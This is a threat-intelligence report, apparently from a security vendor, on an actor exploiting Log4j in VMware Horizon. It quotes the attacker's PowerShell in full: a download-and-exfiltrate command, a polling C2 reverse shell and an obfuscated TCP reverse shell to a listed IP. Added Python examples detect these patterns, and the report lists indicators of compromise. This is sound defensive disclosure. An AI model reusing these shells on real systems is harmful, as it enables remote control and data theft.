By Amitai Ben Shushan Ehrlich and Yair Rigevsky
TunnelVision activities are characterized by wide exploitation of 1-day vulnerabilities in target regions. During the time we’ve been tracking this actor, we have observed wide exploitation of Fortinet FortiOS (CVE-2018-13379), Microsoft Exchange (ProxyShell) and recently Log4Shell. In almost all of those cases, the threat actor deployed a tunneling tool wrapped in a unique fashion. The most commonly deployed tunneling tools used by the group are Fast Reverse Proxy Client (FRPC) and Plink.
TunnelVision activities are correlated to some extent with parts of Microsoft’s Phosphorus, as discussed further in the Attribution section.
In this post, we highlight some of the activities we recently observed from TunnelVision operators, focusing on the exploitation of VMware Horizon Log4j vulnerabilities.
The exploitation of Log4j in VMware Horizon is characterized by a malicious process spawned from the Tomcat service of the VMware product (C:\Program Files\VMware\VMware View\Server\bin\ws_TomcatService.exe).
TunnelVision attackers have been actively exploiting the vulnerability to run malicious PowerShell commands, deploy backdoors, create backdoor users, harvest credentials and perform lateral movement.
Typically, the threat actor initially exploits the Log4j vulnerability to run PowerShell commands directly, and then runs further commands by means of PS reverse shells, executed via the Tomcat process.
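The parent/child relationship described above can be hunted in process-creation telemetry. The following Python sketch is an added example, not code from the original post: it walks parent links in constructed records (field names modelled on Sysmon Event ID 1) and reports every shell that has the Horizon Tomcat service anywhere in its ancestry, which also covers commands run from a reverse shell started by Tomcat. The record fields and the list of shell names are assumptions.

```python
import ntpath

# Parent image path as given in the post; the shell list is an assumption.
TOMCAT_IMAGE = r"C:\Program Files\VMware\VMware View\Server\bin\ws_TomcatService.exe"
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
SYS32 = "C:\\Windows\\System32\\"

# Constructed process-creation records (fields modelled on Sysmon Event ID 1).
EVENTS = [
    {"guid": "A1", "parent": "S0", "image": TOMCAT_IMAGE},
    {"guid": "B2", "parent": "A1", "image": SYS32 + r"WindowsPowerShell\v1.0\powershell.exe"},
    {"guid": "C3", "parent": "B2", "image": SYS32 + "whoami.exe"},
    {"guid": "D4", "parent": "B2", "image": SYS32 + "cmd.exe"},
    {"guid": "E5", "parent": "X9", "image": SYS32 + r"WindowsPowerShell\v1.0\powershell.exe"},
]


def shells_under_tomcat(events):
    """Return (guid, lineage) for every shell with the Horizon Tomcat service as an ancestor."""
    by_guid = {e["guid"]: e for e in events}
    hits = []
    for event in events:
        if ntpath.basename(event["image"]).lower() not in SHELLS:
            continue
        chain, current, seen = [], event, set()
        # Walk parent links upward; `seen` guards against loops in malformed data.
        while current is not None and current["guid"] not in seen:
            seen.add(current["guid"])
            chain.append(current)
            current = by_guid.get(current["parent"])
        if any(a["image"].lower() == TOMCAT_IMAGE.lower() for a in chain[1:]):
            lineage = " > ".join(ntpath.basename(c["image"]) for c in reversed(chain))
            hits.append((event["guid"], lineage))
    return hits


if __name__ == "__main__":
    for guid, lineage in shells_under_tomcat(EVENTS):
        print(guid, lineage)
```

The PowerShell process started outside the Tomcat tree (record E5) is not reported, so the check stays quiet for ordinary administrative use on the same server.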
TunnelVision operators exploited the Log4j vulnerability in VMware Horizon to run PowerShell commands, sending outputs back utilizing a webhook. In this example, the threat actor attempted to download ngrok to a compromised VMware Horizon server:
try{ (New-Object System.Net.WebClient).DownloadFile("hxxp://transfer.sh/uSeOFn/ngrok.exe","C:\\Users\Public\public.exe"); Rename-Item 'c://Users//public//new.txt' 'microsoft.exe'; $a=iex 'dir "c://Users//public//"' | Out-String; iwr -method post -body $a https://webhook.site/{RANDOM-GUID} -UseBasicParsing; }catch{ iwr -method post -body $Error[0] https://webhook.site/{RANDOM-GUID} -UseBasicParsing; }
Throughout the activity, we observed the use of multiple legitimate services. If an environment is compromised by TunnelVision, it may be helpful to look for outbound connections to any of these legitimate public services:
$c = ""
$p = ""
$r = ""
$u = "hxxps://www.microsoft-updateserver.cf/gadfTs55sghsSSS"
$wc = New-Object System.Net.WebClient
$li = (Get-NetIPAddress -AddressFamily IPv4).IPAddress[0];
$c = "whoami"
$c = 'Write-Host " ";'+$c
$r = &(gcm *ke-e*) $c | Out-String > "c:\programdata\$env:COMPUTERNAME-$li"
$ur = $wc.UploadFile("$u/phppost.php" , "c:\programdata\$env:COMPUTERNAME-$li")
while($true)
{
    $c = $wc.DownloadString("$u/$env:COMPUTERNAME-$li/123.txt")
    $c = 'Write-Host " ";'+$c
    if($c -ne $p)
    {
        $r = &(gcm *ke-e*) $c | Out-String > "c:\programdata\$env:COMPUTERNAME-$li"
        $p = $c
        $ur = $wc.UploadFile("$u/phppost.php" , "c:\programdata\$env:COMPUTERNAME-$li")
    }
    sleep 3
}
Reverse Shell #1 was used in the past by TunnelVision operators (7feb4d36a33f43d7a1bb254e425ccd458d3ea921), utilizing a different C2 server: “hxxp://google.onedriver-srv.ml/gadfTs55sghsSSS”. This C2 was referenced in several articles analyzing TunnelVision activities.
Throughout the activity the threat actor leveraged another domain, service-management[.]tk, used to host malicious payloads. According to VirusTotal, this domain was also used to host a zip file (d28e07d2722f771bd31c9ff90b9c64d4a188435a) containing a custom backdoor (624278ed3019a42131a3a3f6e0e2aac8d8c8b438).
The backdoor drops an additional executable file (e76e9237c49e7598f2b3f94a2b52b01002f8e862) to %ProgramData%\Installed Packages\InteropServices.exe and registers it as a service named “InteropServices”.
The dropped executable contains an obfuscated version of the reverse shell as described above, beaconing to the same C2 server (www[.]microsoft-updateserver[.]cf). Although it is not encrypted, it is deobfuscated and executed in a somewhat similar manner to how PowerLess, another backdoor used by the group, executes its PowerShell payload.
$hst = "51.89.135.142"; $prt = 443; function watcher() {; $limit = (Get - Random - Minimum 3 - Maximum 7); $stopWatch = New - Object - TypeName System.Diagnostics.Stopwatch; $timeSpan = New - TimeSpan - Seconds $limit; $stopWatch.Start(); while ((($stopWatch.Elapsed).TotalSeconds - lt $timeSpan.TotalSeconds) ) {}; $stopWatch.Stop(); }; watcher; $arr = New - Object int[] 500; for ($i = 0; $i - lt 99; $i++) {; $arr[$i] = (Get - Random - Minimum 1 - Maximum 25); }; if ($arr[0] - gt 0) {; $valksdhfg = New - Object System.Net.Sockets.TCPClient($hst, $prt); $banljsdfn = $valksdhfg.GetStream(); [byte[]]$bytes = 0..65535|% { 0 }; while (($i = $banljsdfn.Read($bytes, 0, $bytes.Length)) - ne 0) {; $lkjnsdffaa = (New - Object - TypeName System.Text.ASCIIEncoding).GetString($bytes, 0, $i); $nsdfgsahjxx = (&(gcm('*ke-exp*')) $lkjnsdffaa 2 > &1 | Out - String ); $nsdfgsahjxx2 = $nsdfgsahjxx + (pwd).Path + "> "; $sendbyte = ([text.encoding]::ASCII).GetBytes($nsdfgsahjxx2); $banljsdfn.Write($sendbyte, 0, $sendbyte.Length); $banljsdfn.Flush(); watcher }; $valksdhfg.Close(); };
Most of the “online” activities we observed were performed from this PowerShell backdoor. It seems to be a modified variant of a publicly available PowerShell one-liner.
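Both reverse shells shown above avoid the literal string Invoke-Expression by resolving it through a wildcard lookup (`gcm *ke-e*` and `gcm('*ke-exp*')`). The following Python sketch is an added example, not code from the original post: it extracts wildcard arguments passed to `gcm`/`Get-Command` from script text, such as the content of PowerShell script block logging events, and reports the ones that resolve to a cmdlet that executes strings. The cmdlet list, the minimum-literal threshold and the sample lines are assumptions.

```python
import re
from fnmatch import fnmatchcase

# Cmdlets that run a string as code (list chosen for this example).
SENSITIVE = ("Invoke-Expression", "Invoke-Command")
# gcm / Get-Command followed by a positional argument that contains a wildcard.
LOOKUP = re.compile(
    r"""\b(?:gcm|Get-Command)\b\s*\(?\s*['"]?([\w\-*?\[\]]*[*?][\w\-*?\[\]]*)""",
    re.IGNORECASE,
)
MIN_LITERALS = 3  # ignore catch-all patterns such as "*" used for plain enumeration

# Constructed script-block text; the first two lines reuse fragments quoted in the post.
SAMPLE_BLOCKS = [
    '$r = &(gcm *ke-e*) $c | Out-String',
    "$nsdfgsahjxx = (&(gcm('*ke-exp*')) $lkjnsdffaa 2 > &1 | Out - String );",
    "Get-Command *-Service | Select-Object Name",
    "gcm * | Measure-Object",
]


def resolve_wildcard_lookups(script_text):
    """Return [(pattern, [cmdlets it resolves to])] for lookups that reach a sensitive cmdlet."""
    findings = []
    for match in LOOKUP.finditer(script_text):
        pattern = match.group(1)
        literals = re.sub(r"[*?\[\]]", "", pattern)
        if len(literals) < MIN_LITERALS:
            continue
        # PowerShell wildcards are case-insensitive, so compare in lower case.
        resolved = [c for c in SENSITIVE if fnmatchcase(c.lower(), pattern.lower())]
        if resolved:
            findings.append((pattern, resolved))
    return findings


if __name__ == "__main__":
    for block in SAMPLE_BLOCKS:
        print(resolve_wildcard_lookups(block), "<-", block)
```

Matching on what the wildcard resolves to, rather than on the exact strings `*ke-e*` or `*ke-exp*`, keeps the check useful when the pattern is changed slightly between samples.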
Among those activities were:
Throughout the activity, the threat actor utilized a GitHub repository “VmWareHorizon” of an account owned by the threat actor, using the name “protections20”.
TunnelVision activities have been discussed previously and are tracked by other vendors under a variety of names, such as Phosphorus (Microsoft) and, confusingly, either Charming Kitten or Nemesis Kitten (CrowdStrike).
This confusion arises since activity that Microsoft recognizes as a single group, “Phosphorus”, overlaps with activity that CrowdStrike distinguishes as belonging to two different actors, Charming Kitten and Nemesis Kitten.
We track this cluster separately under the name “TunnelVision”. This does not imply we believe they are necessarily unrelated, only that there is at present insufficient data to treat them as identical to any of the aforementioned attributions.
TYPE | INDICATOR | NOTES |
Domain | www[.]microsoft-updateserver[.]cf | Command and Control (C2) Server |
Domain | www[.]service-management[.]tk | Payload server |
IP | 51.89.169[.]198 | Command and Control (C2) Server |
IP | 142.44.251[.]77 | Command and Control (C2) Server |
IP | 51.89.135[.]142 | Command and Control (C2) Server |
IP | 51.89.190[.]128 | Command and Control (C2) Server |
IP | 51.89.178[.]210 | Command and Control (C2) Server, Tunneling Server |
IP | 142.44.135[.]86 | Tunneling Server |
IP | 182.54.217[.]2 | Payload Server |
Github Account | https://github.com/protections20 | Account utilized to host payloads |
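The advice earlier in the post to look for outbound connections, combined with the indicator table above, can be turned into a simple log sweep. The following Python sketch is an added example, not code from the original post: it refangs the indicators at load time and groups matching destinations per source host. The log format, host names and sample lines are constructed, and the public-service list contains only the two services visible in the commands quoted in the post.

```python
import ipaddress
from collections import defaultdict

# Indicators copied from the table above, kept defanged and refanged only at load time.
MALICIOUS = ["www[.]microsoft-updateserver[.]cf", "www[.]service-management[.]tk",
             "51.89.169[.]198", "142.44.251[.]77", "51.89.135[.]142",
             "51.89.190[.]128", "51.89.178[.]210", "142.44.135[.]86", "182.54.217[.]2"]
# Legitimate services that appear in the commands quoted in the post.
PUBLIC = ["transfer.sh", "webhook.site"]

# Constructed log lines: "<timestamp> <source host> <destination>".
SAMPLE_LOG = """\
2022-02-01T10:00:01Z HORIZON-CS01 transfer.sh
2022-02-01T10:00:09Z HORIZON-CS01 webhook.site
2022-02-01T10:02:30Z HORIZON-CS01 WWW.Microsoft-UpdateServer.cf.
2022-02-01T10:05:00Z HORIZON-CS01 51.89.135.142
2022-02-01T10:06:00Z WKSTN-114 notwebhook.site
2022-02-01T10:07:00Z WKSTN-114 151.89.135.142
"""

def refang(value):
    return value.replace("[.]", ".").lower()

def is_ip(value):
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return False

def hit(dest, indicator):
    """IPs must match exactly; domains match the registered name and any subdomain."""
    if is_ip(indicator):
        return is_ip(dest) and ipaddress.ip_address(dest) == ipaddress.ip_address(indicator)
    base = indicator[4:] if indicator.startswith("www.") else indicator
    return dest == base or dest.endswith("." + base)

def sweep(log_text):
    """Return {source host: {"malicious": set, "public": set}} for matching destinations."""
    report = defaultdict(lambda: {"malicious": set(), "public": set()})
    for line in log_text.splitlines():
        _, src, dest = line.split()
        dest = dest.lower().rstrip(".")
        for label, indicators in (("malicious", MALICIOUS), ("public", PUBLIC)):
            for ind in map(refang, indicators):
                if hit(dest, ind):
                    report[src][label].add(ind)
    return dict(report)
```

A hit in the "public" set is only a lead, since these services have legitimate uses; it becomes significant when the source is a Horizon server or when it coincides with a "malicious" hit from the same host.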